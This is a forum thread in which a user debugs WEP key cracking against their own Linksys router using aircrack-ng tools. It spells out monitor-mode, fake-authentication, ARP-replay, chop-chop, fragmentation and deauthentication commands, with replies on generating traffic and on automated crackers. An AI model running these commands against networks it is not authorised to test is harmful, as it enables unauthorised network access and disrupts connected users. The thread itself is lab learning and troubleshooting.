Cant get PRGA for WEP crack...
Cant get PRGA for WEP crack...
"airmon-ng start wlan0"
"airodump-ng mon0"
ESSID: Linksys01
BSSID: xx:xx:xx:xx:xx:xx
Channel: 6
"iwconfig wlan0 channel 6"
"iwconfig mon0 channel 6"
"airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"
...sniffing starts
"aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"
"Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)"
[Can see my MAC show up under stations on airodump-ng sniff]
[AUTH changes to OPN]
---------------------------------
At this point I'm confused/stuck... i perform "ls" in /root. but no .xor file.
I tried arpreply attack...
"aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"
It will continue to read packets and go no where.
I tried a Chop Chop...
"aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"
It will continue to read packets and go no where.
I tried fragmentation...
"aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"
It will continue to read packets and go no where.
Tested packet injection (works). Tried keeping my mac the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.
Any Ideas?
===============================================
ROUTER: Linksys WRtT54G w/DD-WRT v24 sp2
VMware player 5.0.0 build-812388 (4gig ram, 2 processors, 30 gig hard drive, Bridged network adapter)
Back Track 5r3
Alpha AWUS036H
IBM x230
Many of these aireplay attacks will prompt you to confirm the use of a packet before it is used for an attack. Since this is not happening for any of your attacks, I would suggest that there are no data packets being broadcast. When conducting these exercises, I would recommend having at least one wired or wireless client on the network to generate traffic (for example by pinging non-existing hosts to generate ARPs).
Last edited by rastamouse; 11-05-2012 at 05:51 AM.
Re: Cant get PRGA for WEP crack...
Yeah start using automated Wifi crackers; hackpack's airpwn, Gerix, etc. Easy, simple, fast.Originally Posted by Daveneedlinux
Cant get PRGA for WEP crack...
"airmon-ng start wlan0"
"airodump-ng mon0"
ESSID: Linksys01
BSSID: xx:xx:xx:xx:xx:xx
Channel: 6
"iwconfig wlan0 channel 6"
"iwconfig mon0 channel 6"
"airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"
...sniffing starts
"aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"
"Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)"
[Can see my MAC show up under stations on airodump-ng sniff]
[AUTH changes to OPN]
---------------------------------
At this point I'm confused/stuck... i perform "ls" in /root. but no .xor file.
I tried arpreply attack...
"aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"
It will continue to read packets and go no where.
I tried a Chop Chop...
"aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"
It will continue to read packets and go no where.
I tried fragmentation...
"aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"
It will continue to read packets and go no where.
Tested packet injection (works). Tried keeping my mac the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.
Any Ideas?
===============================================
ROUTER: Linksys WRtT54G w/DD-WRT v24 sp2
VMware player 5.0.0 build-812388 (4gig ram, 2 processors, 30 gig hard drive, Bridged network adapter)
Back Track 5r3
Alpha AWUS036H
IBM x230
Re: Cant get PRGA for WEP crack...
I don't know your ultimate goal, but here is a thread that may help a bit.
http://www.backtrack-linux.org/forum...ad.php?t=42602
Re: Cant get PRGA for WEP crack...
Thanks.
I didn't have a computer on the network. I have set up a laptop with a wireless connection, and just sent at continuous ping to the routers IP. New problem.
Arp-reply
----------
Read {packets} packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
(will continue to do this forever untill i Ctrl+c)
Fragmentation
--------------
aireplay-ng -5 -b {BSSID} mon0
Finds a packet
I select "y" to use packet
"Sending fragmented packet"
"Got a deauthentication packet"
"not enough acks, repeating...
"Trying a LLC NULL packet"
It will repeat this till "still nothing, trying another packet"
and i repeat the process.
Chop Chop
----------
aireplay-ng -4 -b {BSSID} mon0
Finds a packet
I select "y" to use packet
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
got several deauthenticaiton packets - pauseing 3 seconds for reconnection
The chopchop attack appears to have failed
Re: Cant get PRGA for WEP crack...
Taking a second look at some of the commands you've been using, I've noticed you are omitting the -w argument in airodump. This tells airodump to write all captured data to a file, which you will need to do if you want to obtain the WEP key later on. This isn't a solution to your problem - but one you will run into later.
Pinging the router IP continuously will unlikely generate new ARPs, since the relevant details for this host are already stored in your clients ARP table. Try pinging an address that is not being used, this will cause a new ARP as the client tries to establish an IP-MAC Address relationship for that host (even though it doesn't exist).
Make sure you are already sniffing and listening for ARPs - as soon as you try and ping this non-existent host, BT should detect the ARP.
Re: Cant get PRGA for WEP crack...
SOLVED:
Thank you rastamouse, I did forget to incorporate -w into my commands. Also The problem seemed to be i wasn't performing a --deauth on the router
"aireplay-ng -0 5 -a {BSSID} mon0"
Once I had my airdump-ng locked onto the channel, and performed a --deauth, I was able to sniff the correct packets.
Posting Permissions
